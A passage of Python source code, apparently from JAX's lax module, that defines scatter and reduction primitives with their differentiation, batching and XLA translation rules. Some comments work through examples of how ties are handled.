_scatter_dimensions_proto(indices_shape, dimension_numbers),
indices_are_sorted, unique_indices)
def _scatter_add_translation_rule(
c, operand, scatter_indices, updates, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices,
expand_complex128=False):
dtype = c.get_shape(operand).numpy_dtype()
scatter_dims = _scatter_dimensions_proto(c.get_shape(scatter_indices),
dimension_numbers)
def _make_reducer(dtype):
subc = xla_bridge.make_computation_builder("scatter_add_reducer")
shape = xc.Shape.array_shape(np.dtype(dtype), ())
args = [xb.parameter(subc, 0, shape), xb.parameter(subc, 1, shape)]
out = xops.Add(args[0], args[1])
return subc.build(out)
if expand_complex128 and dtype == np.complex128:
update_computation = _make_reducer(np.float64)
re = xops.Scatter(xops.Real(operand), scatter_indices, xops.Real(updates),
update_computation, scatter_dims, indices_are_sorted,
unique_indices)
im = xops.Scatter(xops.Imag(operand), scatter_indices, xops.Imag(updates),
update_computation, scatter_dims, indices_are_sorted,
unique_indices)
return xops.Complex(re, im)
else:
update_computation = _make_reducer(dtype)
return xops.Scatter(operand, scatter_indices, updates, update_computation,
scatter_dims, indices_are_sorted, unique_indices)
def _scatter_add_jvp(primals, tangents, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices):
operand, scatter_indices, updates = primals
g_operand, g_scatter_indices, g_updates = tangents
val_out = scatter_add_p.bind(
operand, scatter_indices, updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
if type(g_operand) is ad_util.Zero and type(g_updates) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
g_operand = ad.instantiate_zeros(g_operand)
g_updates = ad.instantiate_zeros(g_updates)
tangent_out = scatter_add_p.bind(
g_operand, scatter_indices, g_updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
return val_out, tangent_out
def _scatter_add_transpose_rule(t, operand, scatter_indices, updates, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
assert not ad.is_undefined_primal(scatter_indices)
if ad.is_undefined_primal(updates):
updates_shape = updates.aval.shape
else:
updates_shape = updates.shape
if type(t) is ad_util.Zero:
operand_t = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
update_t = ad_util.Zero(updates.aval) if ad.is_undefined_primal(updates) else None
else:
operand_t = update_t = None
if ad.is_undefined_primal(operand):
operand_t = t
if ad.is_undefined_primal(updates):
gather_dnums = GatherDimensionNumbers(
offset_dims=dimension_numbers.update_window_dims,
collapsed_slice_dims=dimension_numbers.inserted_window_dims,
start_index_map=dimension_numbers.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(t.shape)):
if i in dimension_numbers.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates_shape[dimension_numbers.update_window_dims[pos]])
pos += 1
update_t = gather(t, scatter_indices, dimension_numbers=gather_dnums,
slice_sizes=slice_sizes)
return [operand_t, None, update_t]
def _scatter_mul_transpose_rule(t, operand, scatter_indices, updates, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
assert not ad.is_undefined_primal(scatter_indices)
if ad.is_undefined_primal(updates):
updates_shape = updates.aval.shape
else:
updates_shape = updates.shape
if type(t) is ad_util.Zero:
operand_t = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
update_t = ad_util.Zero(updates.aval) if ad.is_undefined_primal(updates) else None
else:
operand_t = update_t = None
if ad.is_undefined_primal(operand):
operand_t = scatter_mul(
t, scatter_indices, updates, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
if ad.is_undefined_primal(updates):
gather_dnums = GatherDimensionNumbers(
offset_dims=dimension_numbers.update_window_dims,
collapsed_slice_dims=dimension_numbers.inserted_window_dims,
start_index_map=dimension_numbers.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(t.shape)):
if i in dimension_numbers.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates_shape[dimension_numbers.update_window_dims[pos]])
pos += 1
update_t = gather(mul(t, operand), scatter_indices,
dimension_numbers=gather_dnums, slice_sizes=slice_sizes)
return [operand_t, None, update_t]
def _scatter_batching_rule(scatter_op, batched_args, batch_dims, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
operand, scatter_indices, updates = batched_args
operand_bdim, scatter_indices_bdim, updates_bdim = batch_dims
del update_jaxpr, update_consts # Unused.
# move the operand batch dim to the front if it is not None, otherwise create
# it at the front (so that we can scatter into it)
size = next(x.shape[ax] for x, ax in zip(batched_args, batch_dims)
if ax is not None)
operand = batching.bdim_at_front(operand, operand_bdim, size)
operand_bdim = 0
updates = batching.bdim_at_front(updates, updates_bdim, size)
if scatter_indices_bdim is None:
inserted_window_dims = tuple(np.add(1, dimension_numbers.inserted_window_dims))
update_window_dims = (0,) + tuple(np.add(1, dimension_numbers.update_window_dims))
scatter_dims_to_operand_dims = tuple(np.add(1, dimension_numbers.scatter_dims_to_operand_dims))
dnums = ScatterDimensionNumbers(
update_window_dims=update_window_dims,
inserted_window_dims=inserted_window_dims,
scatter_dims_to_operand_dims=scatter_dims_to_operand_dims)
return scatter_op(
operand, scatter_indices, updates, dnums,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices), 0
# see the third case in _gather_batching_rule for comparison and comments
scatter_indices = batching.bdim_at_front(
scatter_indices, scatter_indices_bdim, size)
count_shape = list(scatter_indices.shape)
count_shape[-1] = 1
counts = broadcasted_iota(scatter_indices.dtype, tuple(count_shape), 0)
scatter_indices = concatenate([counts, scatter_indices],
len(count_shape) - 1)
update_window_dims = tuple(np.add(1, dimension_numbers.update_window_dims))
inserted_window_dims = (0,) + tuple(np.add(1, dimension_numbers.inserted_window_dims))
scatter_dims_to_operand_dims = (0,) + tuple(np.add(1, dimension_numbers.scatter_dims_to_operand_dims))
dnums = ScatterDimensionNumbers(
update_window_dims=update_window_dims,
inserted_window_dims=inserted_window_dims,
scatter_dims_to_operand_dims=scatter_dims_to_operand_dims)
return scatter_op(
operand, scatter_indices, updates, dnums,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices), 0
scatter_add_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-add',
_scatter_add_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.primitive_jvps[scatter_add_p] = _scatter_add_jvp
ad.primitive_transposes[scatter_add_p] = _scatter_add_transpose_rule
batching.primitive_batchers[scatter_add_p] = (
partial(_scatter_batching_rule, scatter_add))
xla.backend_specific_translations['gpu'][scatter_add_p] = partial(
_scatter_add_translation_rule, expand_complex128=True)
scatter_mul_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-mul',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
def _scatter_mul_jvp_rhs(g, x, i, y, *, dimension_numbers,
indices_are_sorted, unique_indices, **kw):
return mul(x, scatter_add(
zeros_like_array(x), i, g, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices))
ad.defjvp(scatter_mul_p,
lambda g, x, i, y, **kw: scatter_mul_p.bind(g, i, y, **kw),
None,
_scatter_mul_jvp_rhs)
ad.primitive_transposes[scatter_mul_p] = _scatter_mul_transpose_rule
batching.primitive_batchers[scatter_mul_p] = (
partial(_scatter_batching_rule, scatter_mul))
def _scatter_extremal_jvp(scatter_op, primals, tangents, update_jaxpr,
update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
operand, scatter_indices, updates = primals
g_operand, g_scatter_indices, g_updates = tangents
scatter_dnums = dimension_numbers
updates_shape = updates.shape
val_out = scatter_op.bind(
operand, scatter_indices, updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=scatter_dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
if type(g_operand) is ad_util.Zero and type(g_updates) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
g_operand = ad.instantiate_zeros(g_operand)
g_updates = ad.instantiate_zeros(g_updates)
# gather_dnums and slice_sizes define the gather op that is the inverse of
# the scatter op specified by scatter_dnums
gather_dnums = GatherDimensionNumbers(
offset_dims=scatter_dnums.update_window_dims,
collapsed_slice_dims=scatter_dnums.inserted_window_dims,
start_index_map=scatter_dnums.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(operand.shape)):
if i in scatter_dnums.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates_shape[scatter_dnums.update_window_dims[pos]])
pos += 1
# For consistency with other max operations, if there are two or more values
# in updates that are contending to replace the same index location, the
# resulting tangent at that location will be the average of the associated
# tangents for the values in updates.
initial_vals = gather(
operand, scatter_indices, gather_dnums, np.array(slice_sizes))
target_vals = gather(
val_out, scatter_indices, gather_dnums, np.array(slice_sizes))
successful_updates = (updates == target_vals)
retained_values = (initial_vals == target_vals)
num_updates = gather(
scatter_add(_zeros(operand),
scatter_indices,
select(successful_updates, _ones(updates), _zeros(updates)),
scatter_dnums),
scatter_indices,
gather_dnums,
np.array(slice_sizes))
num_refs = gather(
scatter_add(_zeros(operand),
scatter_indices,
_ones(updates),
scatter_dnums),
scatter_indices,
gather_dnums,
np.array(slice_sizes))
updates_normalizer = select(retained_values,
1.0 / (num_updates + 1),
1.0 / num_updates)
updates_coef = select(successful_updates,
updates_normalizer,
_zeros(updates))
operand_normalizer = select(retained_values,
1.0 / (num_updates + 1),
_zeros(num_updates))
operand_coef = (-1.0 + operand_normalizer) / num_refs
# This can be simplified once scatter has transpose implemented
target_tangents = gather(
g_operand, scatter_indices, gather_dnums, np.array(slice_sizes))
tangent_updates = (target_tangents * operand_coef +
g_updates * updates_coef)
tangent_out = scatter_add(g_operand,
scatter_indices,
tangent_updates,
scatter_dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
return val_out, tangent_out
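# Worked example (illustrative only) for scatter-max: if two updates u0 and
# u1 both equal the winning maximum at a location while the original operand
# value loses, then num_updates = 2 and retained_values is False, so each
# winning update contributes half of its tangent and the operand's tangent at
# that location is fully replaced. If the operand value ties as well,
# retained_values is True, the normalizers become 1 / (num_updates + 1), and
# the operand tangent keeps a one-third share alongside the two updates.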
scatter_min_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-min',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
batching.primitive_batchers[scatter_min_p] = (
partial(_scatter_batching_rule, scatter_min))
ad.primitive_jvps[scatter_min_p] = partial(_scatter_extremal_jvp, scatter_min_p)
scatter_max_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-max',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
batching.primitive_batchers[scatter_max_p] = (
partial(_scatter_batching_rule, scatter_max))
ad.primitive_jvps[scatter_max_p] = partial(_scatter_extremal_jvp, scatter_max_p)
def _scatter_jvp(primals, tangents, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices):
operand, scatter_indices, updates = primals
g_operand, g_scatter_indices, g_updates = tangents
dnums = dimension_numbers
if type(g_operand) is ad_util.Zero and type(g_updates) is ad_util.Zero:
val_out = scatter_p.bind(
operand, scatter_indices, updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=dnums,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
return val_out, ad_util.Zero.from_value(val_out)
g_operand = ad.instantiate_zeros(g_operand)
g_updates = ad.instantiate_zeros(g_updates)
# If there are overlapping indices in the scatter, it is unspecified which
# update "wins". So we use the following perhaps surprising scheme:
# a) attach a positive ID to each update in updates, and perform the scatter
# on the IDs
# b) perform the inverse gather on the scattered IDs (similar to
# _scatter_add_transpose).
# c) use the gathered IDs to mask the primal and tangent values.
# d) perform a scatter-add on the masked primal and tangent values. A benefit
# of using scatter-add here is that we don't need a `scatter` transpose
# rule.
# a) attach a positive ID to each update in `updates`, and perform a scatter
# on the IDs.
ids_shape = np.array(updates.shape, dtype=np.int64)
ids_shape[dnums.update_window_dims,] = 1
num_ids = np.prod(ids_shape)
id_dtype = np.uint32 if (num_ids + 1) < np.iinfo(np.uint32).max else np.uint64
update_ids = add(reshape(iota(id_dtype, num_ids), ids_shape),
_ones(updates, dtype=id_dtype))
scattered_ids = scatter(full(operand.shape, 0, id_dtype),
scatter_indices, update_ids, dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
# b) compute the inverse gather that "undoes" the scatter on the id values.
gather_dnums = GatherDimensionNumbers(
offset_dims=dnums.update_window_dims,
collapsed_slice_dims=dnums.inserted_window_dims,
start_index_map=dnums.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(scattered_ids.shape)):
if i in dnums.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates.shape[dnums.update_window_dims[pos]])
pos += 1
gathered_update_ids = gather(scattered_ids, scatter_indices,
dimension_numbers=gather_dnums,
slice_sizes=slice_sizes)
# c) mask off input elements that do not correspond to a primal output.
masked_operand = select(eq(scattered_ids, _zeros(scattered_ids)),
operand, _zeros(operand))
masked_updates = select(eq(update_ids, gathered_update_ids),
updates, _zeros(updates))
masked_g_operand = select(eq(scattered_ids, _zeros(scattered_ids)),
g_operand, _zeros(g_operand))
masked_g_updates = select(eq(update_ids, gathered_update_ids),
g_updates, _zeros(g_updates))
# d) perform scatter-adds to compute the primal and tangent outputs.
val_out = scatter_add(masked_operand, scatter_indices, masked_updates,
dimension_numbers=dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
tangent_out = scatter_add(masked_g_operand, scatter_indices, masked_g_updates,
dimension_numbers=dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
return val_out, tangent_out
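# Worked example (illustrative only): suppose two updates u0 and u1 both
# target the same operand location. They receive ids 1 and 2, and the scatter
# of ids keeps exactly one (say 2) at that location. Gathering the scattered
# ids back yields (2, 2), so the update mask keeps only u1, the operand is
# masked out at that location (its scattered id is nonzero), and the final
# scatter-adds write u1's primal and tangent alone, consistent with the
# unspecified-winner semantics.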
scatter_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.primitive_jvps[scatter_p] = _scatter_jvp
batching.primitive_batchers[scatter_p] = (
partial(_scatter_batching_rule, scatter))
def _reduce_shape_rule(*avals, computation, jaxpr, consts, dimensions):
operand_avals, init_val_avals = split_list(avals, [len(avals) // 2])
if any(arg.shape != () for arg in init_val_avals):
init_val_shapes = [a.shape for a in init_val_avals]
raise ValueError(f'reduce found non-scalar initial value: {init_val_shapes}')
return [tuple(np.delete(op.shape, dimensions)) for op in operand_avals]
def _reduce_dtype_rule(*avals, computation, jaxpr, consts, dimensions):
operand_avals, init_val_avals = split_list(avals, [len(avals) // 2])
operand_dtypes = [dtypes.canonicalize_dtype(op.dtype) for op in operand_avals]
init_val_dtypes = [dtypes.canonicalize_dtype(init.dtype) for init in init_val_avals]
if operand_dtypes != init_val_dtypes:
raise TypeError(
"reduce operand dtypes should match corresponding initial value dtypes, "
f"got operands={operand_avals} and initial_values={init_val_avals}")
return operand_dtypes
def _reduce_weak_type_rule(*avals, computation, jaxpr, consts, dimensions):
operand_avals, init_val_avals = split_list(avals, [len(avals) // 2])
return [op.weak_type and init_val.weak_type
for op, init_val in safe_zip(operand_avals, init_val_avals)]
def _reduce_translation_rule(c, *values, computation, jaxpr,
consts, dimensions):
operands, init_values = split_list(values, [len(values) // 2])
if len(operands) == 1:
init_value = init_values[0]
xla_computation = _reduction_computation(c, jaxpr, consts, init_value)
out = xops.Reduce(c, operands, init_values, xla_computation, dimensions)
return xops.Tuple(c, (out,))
xla_computation = _reduction_computation(c, jaxpr, consts, init_values, singleton=False)
return xops.Reduce(c, operands, init_values, xla_computation, dimensions)
def _reduce_batch_rule(batched_args, batch_dims, *, computation, jaxpr,
consts, dimensions):
num_operands = len(batched_args) // 2
operands, init_values = split_list(batched_args, [num_operands])
operand_bdims, init_value_bdims = split_list(batch_dims, [num_operands])
if all(init_value_bdim is None for init_value_bdim in init_value_bdims):
# Assume all batch dims are the same for each of the operands
assert all(operand_bdim is not None for operand_bdim in operand_bdims)
assert all(operand_bdim == operand_bdims[0] for operand_bdim in operand_bdims)
# TODO(sharadmv): handle the case when batch dims are different across
# operands or when some are unbatched
operand_bdim = operand_bdims[0]
new_dimensions = [d + bool(d >= operand_bdim) for d in dimensions]
new_operand_bdim = operand_bdim - int(np.sum(np.less(dimensions, operand_bdim)))
new_operand_bdims = [new_operand_bdim] * num_operands
return reduce_p.bind(*(operands + init_values),
computation=computation, dimensions=tuple(new_dimensions),
consts=consts,
jaxpr=jaxpr), new_operand_bdims
else:
raise NotImplementedError # loop and stack
def _reduction_computation(c, jaxpr, consts, init_values, singleton=True):
if singleton:
init_values = [init_values]
shapes = safe_map(c.get_shape, init_values + init_values)
axis_env = xla.AxisEnv(1, (), ()) # no parallel primitives inside reductions
subc = xla_bridge.make_computation_builder("reduction_computation")
assert len(consts) == 0, "Reduction computations cannot have constants"
args = [xb.parameter(subc, i, shape) for i, shape in enumerate(shapes)]
out_nodes = xla.jaxpr_subcomp(subc, jaxpr, None, axis_env, consts, '', *args)
if singleton:
return subc.build(out_nodes[0])
out_nodes = xops.Tuple(subc, out_nodes)
return subc.build(out_nodes)
def _masking_defreducer(prim, identity):
masking.masking_rules[prim] = partial(_reducer_masking_rule, prim, identity)
def _reducer_masking_rule(prim, identity, padded_vals, logical_shapes,
axes, input_shape=None, **reduce_kwargs):
(padded_val,), (logical_shape,) = padded_vals, logical_shapes
padded_shape = masking.padded_shape_as_value(padded_val.shape)
masks = [broadcasted_iota(np.int32, padded_shape, i) < d
for i, d in enumerate(logical_shape) if i in axes]
mask = _reduce(operator.and_, masks)
masked_val = select(mask, padded_val, identity(padded_shape, padded_val.dtype))
prim_bind = partial(prim.bind, **reduce_kwargs)
bind = prim_bind if input_shape is None else partial(prim_bind, input_shape=padded_shape)
return bind(masked_val, axes=axes)
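# Illustrative note (not part of the implementation): for a sum reduction over
# a padded axis of physical length 5 but logical length 3, the masking rule
# above keeps elements 0-2 and replaces elements 3-4 with the reduction
# identity supplied by `identity` (0 for sum, 1 for prod), so the padded and
# unpadded reductions agree.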
reduce_p = core.Primitive('reduce')
reduce_p.multiple_results = True
reduce_p.def_impl(partial(xla.apply_primitive, reduce_p))
reduce_p.def_abstract_eval(
partial(standard_multi_result_abstract_eval, reduce_p, _reduce_shape_rule,
_reduce_dtype_rule, _reduce_weak_type_rule))
xla.translations[reduce_p] = _reduce_translation_rule
batching.primitive_batchers[reduce_p] = _reduce_batch_rule
def _reduce_number_dtype_rule(name, operand, *args, **kw):
if not dtypes.issubdtype(operand.dtype, np.number):
raise TypeError("{} does not accept dtype {}. Accepted dtypes are subtypes "
"of number.".format(name, np.dtype(operand.dtype).name))
return dtypes.canonicalize_dtype(operand.dtype)
def _reduce_sum_shape_rule(operand, *, axes):
return _reduce_op_shape_rule(operand, axes=axes)
def _reduce_sum_translation_rule(c, operand, *, axes):
shape = c.get_shape(operand)
dtype = shape.numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.Reduce(c, [operand], [xb.constant(c, np.array(0, dtype))],
xla.primitive_subcomputation(add_p, scalar, scalar),
axes)
def _reduce_sum_transpose_rule(cotangent, operand, *, axes):
assert ad.is_undefined_primal(operand)
input_shape = operand.aval.shape
broadcast_dimensions = tuple(np.delete(np.arange(len(input_shape)), axes))
result = broadcast_in_dim(cotangent, input_shape, broadcast_dimensions)
assert result.shape == input_shape
return [result]
reduce_sum_p = standard_primitive(
_reduce_sum_shape_rule, partial(_reduce_number_dtype_rule, 'reduce_sum'),
'reduce_sum', _reduce_sum_translation_rule)
ad.deflinear2(reduce_sum_p, _reduce_sum_transpose_rule)
batching.defreducer(reduce_sum_p)
_masking_defreducer(reduce_sum_p,
lambda shape, dtype: np.broadcast_to(np.array(0, dtype), shape))
def _reduce_op_shape_rule(operand, *, axes, input_shape=None):
del input_shape # Unused.
if len(axes) != len(set(axes)):
raise ValueError(f"duplicate value in 'axes' of reduction: {axes}")
if not all(0 <= a < operand.ndim for a in axes):
raise ValueError(f"reduction axes {axes} contains out-of-bounds indices for {operand}.")
return tuple(np.delete(operand.shape, axes))
def _reduce_prod_translation_rule(c, operand, *, axes):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.Reduce(c, [operand], [xb.constant(c, np.array(1, dtype))],
xla.primitive_subcomputation(mul_p, scalar, scalar), axes)
def _reduce_prod_jvp_rule(primals, tangents, *, axes):
operand, = primals
tangent, = tangents
input_shape = np.array(operand.shape)
n = np.prod(input_shape[list(axes)])
non_axes = np.delete(np.arange(len(input_shape)), axes)
# Move the reduced axes to the front, and flatten them to 1D.
permutation = axes + tuple(non_axes)
new_shape = (n,) + tuple(input_shape[non_axes])
operand = reshape(operand, new_shape, permutation)
tangent = reshape(tangent, new_shape, permutation)
def _reduce_prod_tree(x, axis=0):
"""Reduce by repeatedly splitting the array and multiplying."""
while x.shape[axis] > 1:
n = x.shape[axis]
n1 = (n + 1) // 2
n2 = n - n1
x1 = slice_in_dim(x, 0, n1)
x2 = slice_in_dim(x, n1, None)
if n2 != n1:
paddings = [(0, 0, 0)] * len(x.shape)
paddings[axis] = (0, 1, 0)
x2 = pad(x2, _const(x, 1), paddings)
x = x1 * x2
if x.shape[axis] == 0:
return full(input_shape[non_axes], _one(x))
return squeeze(x, (axis,))
return api.jvp(_reduce_prod_tree, (operand,), (tangent,))
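# Illustrative sketch of the tree reduction used above (comment only): for a
# reduced axis of length 5, the repeated split-and-multiply proceeds as
#   [a, b, c, d, e] -> [a*d, b*e, c*1] -> [a*d*c, b*e*1] -> [a*b*c*d*e],
# padding the shorter half with 1 so every step is an ordinary elementwise
# multiply that the JVP can be taken through.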
reduce_prod_p = standard_primitive(
_reduce_op_shape_rule, partial(_reduce_number_dtype_rule, 'reduce_prod'),
'reduce_prod', _reduce_prod_translation_rule)
ad.primitive_jvps[reduce_prod_p] = _reduce_prod_jvp_rule
batching.defreducer(reduce_prod_p)
_masking_defreducer(reduce_prod_p,
lambda shape, dtype: np.broadcast_to(np.array(1, dtype), shape))
def _reduce_chooser_shape_rule(operand, *, axes):
return tuple(np.delete(operand.shape, axes))
def _reduce_chooser_translation_rule(prim, identity, c, operand, *, axes):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.Reduce(c, [operand], [xb.constant(c, identity(dtype))],
xla.primitive_subcomputation(prim, scalar, scalar), axes)
def _reduce_chooser_jvp_rule(g, ans, operand, *, axes):
# TODO(mattjj): an alternative is to use variadic reduce to compute the chosen
# locations in a single pass (rather than comparing equality) and use a
# gather, and/or even push along the chosen elements of g (b/112040122)
shape = [1 if i in axes else d for i, d in enumerate(operand.shape)]
location_indicators = convert_element_type(
_eq_meet(operand, reshape(ans, shape)), g.dtype)
counts = _reduce_sum(location_indicators, axes)
return div(_reduce_sum(mul(g, location_indicators), axes), counts)
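# Illustrative note: for a reduce_max over x = [3., 5., 5.], location_indicators
# is [0., 1., 1.] and counts is 2., so an incoming tangent g = [g0, g1, g2]
# produces (g1 + g2) / 2; tied maxima share the gradient equally.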
_reduce_max_translation_rule = partial(_reduce_chooser_translation_rule, max_p,
_get_max_identity)
reduce_max_p = standard_primitive(_reduce_op_shape_rule, _input_dtype,
'reduce_max', _reduce_max_translation_rule)
ad.defjvp2(reduce_max_p, _reduce_chooser_jvp_rule)
batching.defreducer(reduce_max_p)
_masking_defreducer(reduce_max_p,
lambda shape, dtype: np.broadcast_to(np.array(-np.inf, dtype), shape))
_reduce_min_translation_rule = partial(
_reduce_chooser_translation_rule, min_p, _get_min_identity)
reduce_min_p = standard_primitive(_reduce_op_shape_rule, _input_dtype,
'reduce_min', _reduce_min_translation_rule)
ad.defjvp2(reduce_min_p, _reduce_chooser_jvp_rule)
batching.defreducer(reduce_min_p)
_masking_defreducer(reduce_min_p,
lambda shape, dtype: np.broadcast_to(np.array(np.inf, dtype), shape))
def _argminmax_shape_rule(operand, *, axes, index_dtype):
axis, = axes
return tuple(np.delete(operand.shape, axis))
def _argminmax_dtype_rule(operand, *, axes, index_dtype):
if not dtypes.issubdtype(index_dtype, np.integer):
raise TypeError("index_dtype must be an integer type, but got {}"
.format(np.dtype(index_dtype).name))
return index_dtype
def _argminmax_translation_rule(value_comparator, identity,
c, operand, *, axes, index_dtype):
axis, = axes
shape = c.get_shape(operand)
dtype = shape.numpy_dtype()
subc = xb.make_computation_builder("argminmax_comparator")
value_shape = xc.Shape.array_shape(shape.xla_element_type(), ())
index_shape = xc.Shape.array_shape(index_dtype, ())
x_value = xb.parameter(subc, 0, value_shape)
x_index = xb.parameter(subc, 1, index_shape)
y_value = xb.parameter(subc, 2, value_shape)
y_index = xb.parameter(subc, 3, index_shape)
which_value = value_comparator(x_value, y_value)
which_index = xops.Or(which_value, xops.And(xops.Eq(x_value, y_value),
xops.Lt(x_index, y_index)))
xops.Tuple(subc, [xops.Select(which_value, x_value, y_value),
xops.Select(which_index, x_index, y_index)])
comparator = subc.build()
iota_shape = xc.Shape.array_shape(index_dtype, shape.dimensions())
iota = xc.ops.Iota(c, iota_shape, axis)
out = xops.Reduce(
c, [operand, iota],
[xb.constant(c, identity(dtype)),
xb.constant(c, np.array(0, index_dtype))], comparator, [axis])
return xops.GetTupleElement(out, 1)
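# Illustrative note: the comparator built above breaks ties in favor of the
# smaller index, so e.g. argmax over [3., 7., 7.] yields index 1 rather than 2.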
def _argminmax_gpu_translation_rule(op, a, *, axes, index_dtype):
axis, = axes
idxs = tie_in(a, broadcasted_iota(index_dtype, a.shape, axis))
maxval = np.array(dtypes.iinfo(index_dtype).max, dtype=index_dtype)
maxval = broadcast(tie_in(a, maxval), a.shape)
mask_idxs = select(eq(a, expand_dims(op(a, (axis,)), (axis,))), idxs,
maxval)
return _reduce_min(mask_idxs, (axis,))
_argmin_translation_rule = partial(_argminmax_translation_rule, xops.Lt,
_get_min_identity)
_argmax_translation_rule = partial(_argminmax_translation_rule, xops.Gt,
_get_max_identity)
argmin_p = standard_primitive(_argminmax_shape_rule, _argminmax_dtype_rule,
'argmin', _argmin_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(argmin_p)
ad.defjvp_zero(argmin_p)
xla.backend_specific_translations['gpu'][argmin_p] = xla.lower_fun(
partial(_argminmax_gpu_translation_rule, _reduce_min),
multiple_results=False)
argmax_p = standard_primitive(_argminmax_shape_rule, _argminmax_dtype_rule,
'argmax', _argmax_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(argmax_p)
ad.defjvp_zero(argmax_p)
xla.backend_specific_translations['gpu'][argmax_p] = xla.lower_fun(
partial(_argminmax_gpu_translation_rule, _reduce_max),
multiple_results=False)
def _reduce_logical_shape_rule(operand, *, axes):
if operand.dtype != np.bool_:
msg = "logical reduction requires operand dtype bool, got {}."
raise TypeError(msg.format(operand.dtype))
return tuple(np.delete(operand.shape, axes))
def _reduce_logical_translation_rule(prim, identity, c, operand, *, axes):
scalar = ShapedArray((), np.bool_)
return xops.Reduce(c, [operand], [xb.constant(c, identity(np.bool_))],
xla.primitive_subcomputation(prim, scalar, scalar), axes)
_reduce_or_translation_rule = partial(_reduce_logical_translation_rule,
or_p, _get_max_identity)
reduce_or_p = standard_primitive(_reduce_logical_shape_rule, _fixed_dtype(np.bool_),
'reduce_or', _reduce_or_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(reduce_or_p)
_reduce_and_translation_rule = partial(_reduce_logical_translation_rule,
and_p, _get_min_identity)
reduce_and_p = standard_primitive(_reduce_logical_shape_rule, _fixed_dtype(np.bool_),
'reduce_and', _reduce_and_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(reduce_and_p)
def _reduce_window_shape_rule(operand, init_value, *, jaxpr, consts,
window_dimensions, window_strides, padding,
base_dilation, window_dilation):
if operand.dtype != init_value.dtype:
msg = ("reduce_window got inconsistent dtypes for operand and init_value: "
" got operand dtype {} and init_value dtype {}.")
raise TypeError(msg.format(operand.dtype, init_value.dtype))
if init_value.shape != ():
msg = ("reduce_window expected init_value to be a scalar but init_value "
"has shape {}.")
raise TypeError(msg.format(init_value.shape))
return _common_reduce_window_shape_rule(
operand, window_dimensions, window_strides, padding, base_dilation,
window_dilation)
def _reduce_window_translation_rule(c, operand, init_value, *, jaxpr, consts,
window_dimensions, window_strides, padding,
base_dilation, window_dilation):
xla_computation = _reduction_computation(c, jaxpr, consts, init_value)
return xops.ReduceWindowWithGeneralPadding(
operand, init_value, xla_computation, window_dimensions,
window_strides, base_dilation, window_dilation, padding)
def _generic_reduce_window_batch_rule(
batched_args, batch_dims, *, jaxpr, consts, window_dimensions,
window_strides, padding, base_dilation, window_dilation):
operand, init = batched_args
bdim, init_bdim = batch_dims
if init_bdim is not None:
raise NotImplementedError("reduce_window batching is not implemented for "
"initial values")
def reduce_window(x, window_dimensions, window_strides, padding, base_dilation,
window_dilation):
return reduce_window_p.bind(
x, init, jaxpr=jaxpr, consts=consts, window_dimensions=window_dimensions,
window_strides=window_strides, padding=padding, base_dilation=base_dilation,
window_dilation=window_dilation)
return _reduce_window_batch_rule(
reduce_window, (operand,), (bdim,), window_dimensions=window_dimensions,
window_strides=window_strides, padding=padding, base_dilation=base_dilation,
window_dilation=window_dilation)
reduce_window_p = standard_primitive(
